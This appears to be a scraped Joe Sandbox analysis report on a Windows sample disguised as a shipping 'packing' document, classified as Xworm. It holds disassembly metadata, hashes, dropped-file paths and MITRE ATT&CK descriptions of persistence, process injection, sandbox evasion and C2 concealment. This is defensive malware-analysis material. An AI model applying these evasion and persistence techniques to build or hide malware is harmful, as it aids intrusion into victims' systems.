API ID:
String ID:
API String ID:
Opcode ID: 84f1c38b68fbb858bf2eef26f8de325ce803faeeabcaf5699af0a674008c843a
Instruction ID: 3864309915a48a435191011e02415333bbd9c447e45ee6a48b286fcb5d4c875a
Opcode Fuzzy Hash: 84f1c38b68fbb858bf2eef26f8de325ce803faeeabcaf5699af0a674008c843a
Instruction Fuzzy Hash: D3B092300447088FC258AF79F4049147329FB4521938004ECE90E0A2928F76E889CA85

Non-executed Functions

Function 04DCEBB8 Relevance: 10.1, Strings: 8, Instructions: 148COMMON

Download Yara Rule

Strings

0o@p, xrefs: 04DCED47
$]q, xrefs: 04DCED55
$]q, xrefs: 04DCED6F
$]q, xrefs: 04DCED21
,aq, xrefs: 04DCEC0D
$]q, xrefs: 04DCECB0
$]q, xrefs: 04DCED07
$]q, xrefs: 04DCED3B

Memory Dump Source

Source File: 0000000C.00000002.2242555324.0000000004DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_4dc0000_powershell.jbxd

Similarity

API ID:
String ID: ,aq$0o@p$$]q$$]q$$]q$$]q$$]q$$]q
API String ID: 0-3294546130
Opcode ID: dbf1dedac8a70fe3cd1200b918612aa2629bde6d21e18baeff3437584039cb29
Instruction ID: 05b8140795d4e936b01857d6ed4bf7eba9ee3b782f09056bf735d15ec9364e0d
Opcode Fuzzy Hash: dbf1dedac8a70fe3cd1200b918612aa2629bde6d21e18baeff3437584039cb29
Instruction Fuzzy Hash: 90414FB03845228FC7296F79895493C2BD77F89B5131008AED462CB3B5EF58EC41DB62

Function 04DCEDE8 Relevance: 9.2, Strings: 7, Instructions: 453COMMON

Download Yara Rule

Strings

0o@p, xrefs: 04DCF237
$]q, xrefs: 04DCF110
0o@p, xrefs: 04DCF243
$]q, xrefs: 04DCF326
$]q, xrefs: 04DCF16C
`Q]q, xrefs: 04DCF2FC
0o@p, xrefs: 04DCF205

Memory Dump Source

Source File: 0000000C.00000002.2242555324.0000000004DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_4dc0000_powershell.jbxd

Similarity

API ID:
String ID: 0o@p$0o@p$0o@p$`Q]q$$]q$$]q$$]q
API String ID: 0-2772630205
Opcode ID: 9423c7f5302e611647c2ecc2ed4b32e000abf1d1bdc084f721ad75743cd7cd77
Instruction ID: 6e00bedf5888ecd67d9f4b2c5f4c38ac1b4f1d1c99bc286ca2ce19eabd260f86
Opcode Fuzzy Hash: 9423c7f5302e611647c2ecc2ed4b32e000abf1d1bdc084f721ad75743cd7cd77
Instruction Fuzzy Hash: B7E117307502128FDB249B7D881466E77DBAFC9B14B2544AED806DF3A5EE78EC01C7A1

Function 079D3678 Relevance: 8.9, Strings: 7, Instructions: 186COMMON

Download Yara Rule

Strings

$]q, xrefs: 079D382A
$]q, xrefs: 079D37FF
4']q, xrefs: 079D372E
Ml, xrefs: 079D387B
Ml, xrefs: 079D386D
4']q, xrefs: 079D3722
$]q, xrefs: 079D3836

Memory Dump Source

Source File: 0000000C.00000002.2281188120.00000000079D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_79d0000_powershell.jbxd

Similarity

API ID:
String ID: 4']q$4']q$$]q$$]q$$]q$Ml$Ml
API String ID: 0-1672596896
Opcode ID: d0ee090dcc0af7ba3bd1087e692f47893d221e6afc9397e28f3c3395ebe6a1d6
Instruction ID: 690d8027febdfe994b5aef8e3d90e53aa84c226d29be89e3bc5cc946a205f0ad
Opcode Fuzzy Hash: d0ee090dcc0af7ba3bd1087e692f47893d221e6afc9397e28f3c3395ebe6a1d6
Instruction Fuzzy Hash: 2C5136F5704306DFCB249A698810666BBEAAFC262AF24C47BD445CB351DB35CC45C7A3

Function 04DC7A09 Relevance: 6.5, Strings: 5, Instructions: 239COMMON

Download Yara Rule

Strings

tMWl, xrefs: 04DC7ABC
`^q, xrefs: 04DC7CAA
`^q, xrefs: 04DC7B0B
`^q, xrefs: 04DC7C2C
`^q, xrefs: 04DC7B8A

Memory Dump Source

Source File: 0000000C.00000002.2242555324.0000000004DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_4dc0000_powershell.jbxd

Similarity

API ID:
String ID: tMWl$`^q$`^q$`^q$`^q
API String ID: 0-643008544
Opcode ID: 58be67349b5571d5563f4363de4da2640c292f42ea757d51b93b9a46c70201a7
Instruction ID: adbf7852336a3be6167072472344e460d06262abfd661fc34d59cca74e89ce6f
Opcode Fuzzy Hash: 58be67349b5571d5563f4363de4da2640c292f42ea757d51b93b9a46c70201a7
Instruction Fuzzy Hash: 7CB1A874E0120A9FDB54DFA9D990A9DFBF6FF89300F10862AD819AB314D734A945CF90

Function 04DC7A18 Relevance: 6.5, Strings: 5, Instructions: 234COMMON

Download Yara Rule

Strings

tMWl, xrefs: 04DC7ABC
`^q, xrefs: 04DC7CAA
`^q, xrefs: 04DC7B0B
`^q, xrefs: 04DC7C2C
`^q, xrefs: 04DC7B8A

Memory Dump Source

Source File: 0000000C.00000002.2242555324.0000000004DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_4dc0000_powershell.jbxd

Similarity

API ID:
String ID: tMWl$`^q$`^q$`^q$`^q
API String ID: 0-643008544
Opcode ID: 3bddfbd851410a1681bf3dcc4f9c2aa0d981fe2eafeb12c43fd22b7a8e60b890
Instruction ID: 1221b5e224664d15f302d4d3be97b46af9ad5dcf3c4dc51ea54fd291efaffa49
Opcode Fuzzy Hash: 3bddfbd851410a1681bf3dcc4f9c2aa0d981fe2eafeb12c43fd22b7a8e60b890
Instruction Fuzzy Hash: D9B18974E0120A9FDB54DFA9D590A9DFBF6FF89300F108629D819AB314D734A945CF90

Function 079D24B8 Relevance: 6.4, Strings: 5, Instructions: 131COMMON

Download Yara Rule

Strings

JXl, xrefs: 079D259E
|,!k, xrefs: 079D25DB
4']q, xrefs: 079D260D
rWl, xrefs: 079D254F
JXl, xrefs: 079D25EA

Memory Dump Source

Source File: 0000000C.00000002.2281188120.00000000079D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_79d0000_powershell.jbxd

Similarity

API ID:
String ID: 4']q$|,!k$JXl$JXl$rWl
API String ID: 0-3389224141
Opcode ID: b6aa87aafd114f2a8e8b5b6eb6e07a3d1ae59f02eaac6ee82eb60189f9577c8c
Instruction ID: 147e8e04d18a16905ea65c3db4d75a86d2d02cb303f338c074648ceb2702d1a8
Opcode Fuzzy Hash: b6aa87aafd114f2a8e8b5b6eb6e07a3d1ae59f02eaac6ee82eb60189f9577c8c
Instruction Fuzzy Hash: 674102F5A00306CFDB25CF98D850AAAB7E9FF85219F44C06BD8048B250D735DD45CBA1

Function 04DC71F8 Relevance: 5.2, Strings: 4, Instructions: 185COMMON

Download Yara Rule

Strings

`^q, xrefs: 04DC7CAA
`^q, xrefs: 04DC7B0B
`^q, xrefs: 04DC7C2C
`^q, xrefs: 04DC7B8A

Memory Dump Source

Source File: 0000000C.00000002.2242555324.0000000004DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_4dc0000_powershell.jbxd

Similarity

API ID:
String ID: `^q$`^q$`^q$`^q
API String ID: 0-4294711580
Opcode ID: 1d3be6f890b9c96671eda5ee496a8bf5cbcbb61532005102c27bf13fef669791
Instruction ID: 0f6f3de19c43bbfbd9f60ca65b646e0eea8e76fd3e89d34c7b39d9fe08b53c2b
Opcode Fuzzy Hash: 1d3be6f890b9c96671eda5ee496a8bf5cbcbb61532005102c27bf13fef669791
Instruction Fuzzy Hash: A3915374E0121A9FDB54DFA9D590A9DFBF6FF48300F20862AD819AB314D734A905CF90

Function 079D5798 Relevance: 5.1, Strings: 4, Instructions: 94COMMON

Download Yara Rule

Strings

$]q, xrefs: 079D57AA
$]q, xrefs: 079D5800
$]q, xrefs: 079D57F4
$]q, xrefs: 079D57C6

Memory Dump Source

Source File: 0000000C.00000002.2281188120.00000000079D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_79d0000_powershell.jbxd

Similarity

API ID:
String ID: $]q$$]q$$]q$$]q
API String ID: 0-858218434
Opcode ID: 60ab6c2d887b06482389dd598b4a5fbfbcd6b3a9f059f6ba4b3cf8ed45b141c8
Instruction ID: 05410bcd959a4b7a5a286adcfd205a3e5499a384674c103fcb58e4b925b6318a
Opcode Fuzzy Hash: 60ab6c2d887b06482389dd598b4a5fbfbcd6b3a9f059f6ba4b3cf8ed45b141c8
Instruction Fuzzy Hash: 9F2127B13103129BDB38997E9C40B27BBDAABC1719F25C82AE905CB381DD76CC518361

Function 079D220A Relevance: 5.1, Strings: 4, Instructions: 52COMMON

Download Yara Rule

Strings

JXl, xrefs: 079D2245
lcJk, xrefs: 079D2237
TcJk, xrefs: 079D21F2
JXl, xrefs: 079D2251

Memory Dump Source

Source File: 0000000C.00000002.2281188120.00000000079D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_79d0000_powershell.jbxd

Similarity

API ID:
String ID: TcJk$lcJk$JXl$JXl
API String ID: 0-2516379555
Opcode ID: 9d6dda4345e447dd983cc929457b4962350f395f6377297780454d5e86c55163
Instruction ID: cb2615b15c30f3d735794d8a81e7ab102677cd691ed9ded22cea99c7a12c04a2
Opcode Fuzzy Hash: 9d6dda4345e447dd983cc929457b4962350f395f6377297780454d5e86c55163
Instruction Fuzzy Hash: 55016BB13093A15FC32583284C50A93BF5AAFD6B04F05C857D5409F696C6748C45C3A2

Function 079D030A Relevance: 5.0, Strings: 4, Instructions: 48COMMON

Download Yara Rule

Strings

$]q, xrefs: 079D035E
4']q, xrefs: 079D0373
4']q, xrefs: 079D037F
$]q, xrefs: 079D0352

Memory Dump Source

Source File: 0000000C.00000002.2281188120.00000000079D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_79d0000_powershell.jbxd

Similarity

API ID:
String ID: 4']q$4']q$$]q$$]q
API String ID: 0-978391646
Opcode ID: e4b594c120a0bc8e220ef2a1b11702ee3454029ea8ab8c8340ce6e224347ab08
Instruction ID: d7c06511448e955724599dc8430615e602949cb8c0d306f0e13bb335da7b65ec
Opcode Fuzzy Hash: e4b594c120a0bc8e220ef2a1b11702ee3454029ea8ab8c8340ce6e224347ab08
Instruction Fuzzy Hash: 42018F20B093C64FC73B123C1960565AFBAAF83954B2A85E7C481CF2A7C9584D4A83A7

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata, File: File Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Xworm

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe.log

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\Log.tmp

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0e2khuxc.z2g.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0zkopqrk.c1h.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1puojpvp.gjq.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5fgbf1fg.5z3.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cctkwvjs.ojt.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ddz1g5gd.dur.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_eyo11ksp.ezi.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jzw3zstz.gsz.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lbwkwkaw.a0x.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lut3sdm0.lg4.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mgmdjcek.jdl.psm1

Windows Analysis Report
PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe

Function 0903A158 Relevance: 6.6, Strings: 5, Instructions: 328
COMMON

Function 090399F0 Relevance: 3.1, Strings: 2, Instructions: 562
COMMON